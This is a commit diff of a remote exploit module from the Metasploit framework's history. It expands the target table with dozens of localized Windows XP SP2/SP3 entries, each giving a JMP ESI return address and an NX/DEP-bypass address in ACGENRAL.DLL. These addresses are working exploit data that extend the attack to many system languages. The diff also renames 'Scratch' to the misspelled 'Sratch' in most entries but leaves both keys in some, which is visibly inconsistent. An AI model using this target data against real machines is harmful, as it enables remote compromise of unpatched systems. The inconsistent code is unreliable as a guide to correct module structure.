Complete international support for XP SP2 / XP SP3
git-svn-id: file:///home/svn/framework3/trunk@5846 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9ee7eb2e87
commit
308a90a01d
|
@ -102,8 +102,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP SP2 English (NX)',
|
||||
{
|
||||
'Ret' => 0x6f88f727,
|
||||
'DisableNX' => 0x6F8916E2,
|
||||
'Scratch' => 0x00020408,
|
||||
'DisableNX' => 0x6f8916e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
@ -112,8 +112,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP SP3 English (NX)',
|
||||
{
|
||||
'Ret' => 0x6f88f807,
|
||||
'DisableNX' => 0x6F8917C2,
|
||||
'Scratch' => 0x00020408,
|
||||
'DisableNX' => 0x6f8917c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
@ -166,190 +166,350 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
#
|
||||
# NON-ENGLISH TARGETS
|
||||
# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
|
||||
#
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Arabic (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd8f727,
|
||||
'DisableNX' => 0x6fd916e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f727,
|
||||
'DisableNX' => 0x586116e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Chinese - Simplified (NX)',
|
||||
{
|
||||
'Ret' => 0x58fbf727,
|
||||
'DisableNX' => 0x58fc16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Chinese - Traditional (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f727,
|
||||
'DisableNX' => 0x586116e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Czech (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f727,
|
||||
'DisableNX' => 0x6fe216e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Danish (NX)',
|
||||
{
|
||||
'Ret' => 0x5978f727,
|
||||
'DisableNX' => 0x597916e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 German (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd9f727,
|
||||
'DisableNX' => 0x6fda16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Greek (NX)',
|
||||
{
|
||||
'Ret' => 0x592af727,
|
||||
'DisableNX' => 0x592b16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Spanish (NX)',
|
||||
{
|
||||
'Ret' => 0x6fdbf727,
|
||||
'DisableNX' => 0x6fdc16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Finnish (NX)',
|
||||
{
|
||||
'Ret' => 0x597df727,
|
||||
'DisableNX' => 0x597e16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 French (NX)',
|
||||
{
|
||||
'Ret' => 0x595bf727,
|
||||
'DisableNX' => 0x595c16e2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Hebrew (NX)',
|
||||
{
|
||||
'Ret' => 0x5940f727,
|
||||
'DisableNX' => 0x594116e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Hungarian (NX)',
|
||||
{
|
||||
'Ret' => 0x5970f727,
|
||||
'DisableNX' => 0x597116e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Giorgio Casali <giorgio.casali[at]gmail.com>
|
||||
#
|
||||
[ 'Windows XP SP2 Italian (NX)',
|
||||
{
|
||||
'Ret' => 0x596bf727,
|
||||
'DisableNX' => 0x596c16e2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Japanese (NX)',
|
||||
{
|
||||
'Ret' => 0x567fd3be,
|
||||
'DisableNX' => 0x568016e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Korean (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd6f727,
|
||||
'DisableNX' => 0x6fd716e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Dutch (NX)',
|
||||
{
|
||||
'Ret' => 0x596cf727,
|
||||
'DisableNX' => 0x596d16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Norwegian (NX)',
|
||||
{
|
||||
'Ret' => 0x597cf727,
|
||||
'DisableNX' => 0x597d16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Polish (NX)',
|
||||
{
|
||||
'Ret' => 0x5941f727,
|
||||
'DisableNX' => 0x594216e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
|
||||
#
|
||||
[ 'Windows XP SP2 Portuguese - Brazilian (NX)',
|
||||
{
|
||||
'Ret' => 0x596ff727,
|
||||
'DisableNX' => 0x597016e2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided think.pink[at]gmx.de
|
||||
#
|
||||
[ 'Windows XP SP2 German (NX)',
|
||||
{
|
||||
'Ret' => 0x6fda2b0f,
|
||||
'DisableNX' => 0x6fda16e2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by sunwear <shellcoder[at]hotmail.com>
|
||||
#
|
||||
[ 'Windows XP SP2 Chinese - Simplified (NX)',
|
||||
{
|
||||
'Ret' => 0x58fcda43,
|
||||
'DisableNX' => 0x58fc16e2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
#
|
||||
[ 'Windows XP SP3 French (NX)',
|
||||
{
|
||||
'Ret' => 0x595bf807,
|
||||
'DisableNX' => 0x595c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ulises2k <ulises2k[at]gmail.com>
|
||||
#
|
||||
[ 'Windows XP SP3 Spanish (NX)',
|
||||
{
|
||||
'Ret' => 0x6fdbf807,
|
||||
'DisableNX' => 0x6fdc17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
#
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Thierry Zoller <Thierry[at]zoller.lu>
|
||||
#
|
||||
[ 'Windows XP SP3 German (NX)',
|
||||
{
|
||||
'Ret' => 0x6fda2bef,
|
||||
'DisableNX' => 0x6fda17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Russian (NX)',
|
||||
[ 'Windows XP SP2 Portuguese (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f807,
|
||||
'DisableNX' => 0x6fe217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x596bf727,
|
||||
'DisableNX' => 0x596c16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Russian (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f727,
|
||||
'DisableNX' => 0x6fe216e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Swedish (NX)',
|
||||
{
|
||||
'Ret' => 0x597af727,
|
||||
'DisableNX' => 0x597b16e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP2 Turkish (NX)',
|
||||
{
|
||||
'Ret' => 0x5a78f727,
|
||||
'DisableNX' => 0x5a7916e2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Arabic (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd8f807,
|
||||
'DisableNX' => 0x6fd917c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Simplified (NX)',
|
||||
{
|
||||
'Ret' => 0x58fbf807,
|
||||
'DisableNX' => 0x58fc17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Traditional (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Russian
|
||||
[ 'Windows XP SP3 Czech (NX)',
|
||||
{
|
||||
'Ret' => 0x6fe1f807,
|
||||
'DisableNX' => 0x6fe217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Danish (NX)',
|
||||
{
|
||||
'Ret' => 0x5978f807,
|
||||
'DisableNX' => 0x597917c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 German (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd9f807,
|
||||
'DisableNX' => 0x6fda17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Greek (NX)',
|
||||
{
|
||||
'Ret' => 0x592af807,
|
||||
'DisableNX' => 0x592b17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Turkish (NX)',
|
||||
[ 'Windows XP SP3 Spanish (NX)',
|
||||
{
|
||||
'Ret' => 0x5a78f807,
|
||||
'DisableNX' => 0x5a7917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x6fdbf807,
|
||||
'DisableNX' => 0x6fdc17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Swedish (NX)',
|
||||
[ 'Windows XP SP3 Finnish (NX)',
|
||||
{
|
||||
'Ret' => 0x597af807,
|
||||
'DisableNX' => 0x597b17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x597df807,
|
||||
'DisableNX' => 0x597e17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Portuguese (NX)',
|
||||
[ 'Windows XP SP3 French (NX)',
|
||||
{
|
||||
'Ret' => 0x596bf807,
|
||||
'DisableNX' => 0x596c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x595bf807,
|
||||
'DisableNX' => 0x595c17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
|
||||
[ 'Windows XP SP3 Portuguese - Brazilian (NX)',
|
||||
[ 'Windows XP SP3 Hebrew (NX)',
|
||||
{
|
||||
'Ret' => 0x596ff807,
|
||||
'DisableNX' => 0x597017c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x5940f807,
|
||||
'DisableNX' => 0x594117c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Hungarian (NX)',
|
||||
{
|
||||
'Ret' => 0x5970f807,
|
||||
'DisableNX' => 0x597117c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Portuguese
|
||||
[ 'Windows XP SP3 Italian (NX)',
|
||||
{
|
||||
'Ret' => 0x596bf807,
|
||||
'DisableNX' => 0x596c17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Polish (NX)',
|
||||
{
|
||||
'Ret' => 0x5941f807,
|
||||
'DisableNX' => 0x594217c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Norwegian (NX)',
|
||||
{
|
||||
'Ret' => 0x597cf807,
|
||||
'DisableNX' => 0x597d17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Korean (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd6f807,
|
||||
'DisableNX' => 0x6fd717c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
@ -358,91 +518,92 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'Ret' => 0x567fd4d2,
|
||||
'DisableNX' => 0x568017c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Hungarian (NX)',
|
||||
[ 'Windows XP SP3 Korean (NX)',
|
||||
{
|
||||
'Ret' => 0x5970f807,
|
||||
'DisableNX' => 0x597117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x6fd6f807,
|
||||
'DisableNX' => 0x6fd717c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Hebrew (NX)',
|
||||
[ 'Windows XP SP3 Dutch (NX)',
|
||||
{
|
||||
'Ret' => 0x5940f807,
|
||||
'DisableNX' => 0x594117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x596cf807,
|
||||
'DisableNX' => 0x596d17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Finnish (NX)',
|
||||
[ 'Windows XP SP3 Norwegian (NX)',
|
||||
{
|
||||
'Ret' => 0x597df807,
|
||||
'DisableNX' => 0x597e17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x597cf807,
|
||||
'DisableNX' => 0x597d17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # PUSH ESI; RET ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Greek (NX)',
|
||||
[ 'Windows XP SP3 Polish (NX)',
|
||||
{
|
||||
'Ret' => 0x592af807,
|
||||
'DisableNX' => 0x592b17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x5941f807,
|
||||
'DisableNX' => 0x594217c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Danish (NX)',
|
||||
[ 'Windows XP SP3 Portuguese - Brazilian (NX)',
|
||||
{
|
||||
'Ret' => 0x5978f807,
|
||||
'DisableNX' => 0x597917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x596ff807,
|
||||
'DisableNX' => 0x597017c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Simplified (NX)',
|
||||
[ 'Windows XP SP3 Portuguese (NX)',
|
||||
{
|
||||
'Ret' => 0x58fbf807,
|
||||
'DisableNX' => 0x58fc17c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x596bf807,
|
||||
'DisableNX' => 0x596c17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Chinese - Traditional (NX)',
|
||||
[ 'Windows XP SP3 Russian (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x6fe1f807,
|
||||
'DisableNX' => 0x6fe217c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
# Same as Chinese Traditional
|
||||
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
|
||||
[ 'Windows XP SP3 Swedish (NX)',
|
||||
{
|
||||
'Ret' => 0x5860f807,
|
||||
'DisableNX' => 0x586117c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x597af807,
|
||||
'DisableNX' => 0x597b17c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
# Metasploit's NX bypass for XP SP2/SP3
|
||||
[ 'Windows XP SP3 Arabic (NX)',
|
||||
[ 'Windows XP SP3 Turkish (NX)',
|
||||
{
|
||||
'Ret' => 0x6fd8f807,
|
||||
'DisableNX' => 0x6fd917c2,
|
||||
'Scratch' => 0x00020408,
|
||||
'Ret' => 0x5a78f807,
|
||||
'DisableNX' => 0x5a7917c2,
|
||||
'Sratch' => 0x00020408
|
||||
}
|
||||
], # CALL ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
||||
|
||||
|
||||
|
||||
#
|
||||
# Missing Targets
|
||||
|
|
Loading…
Reference in New Issue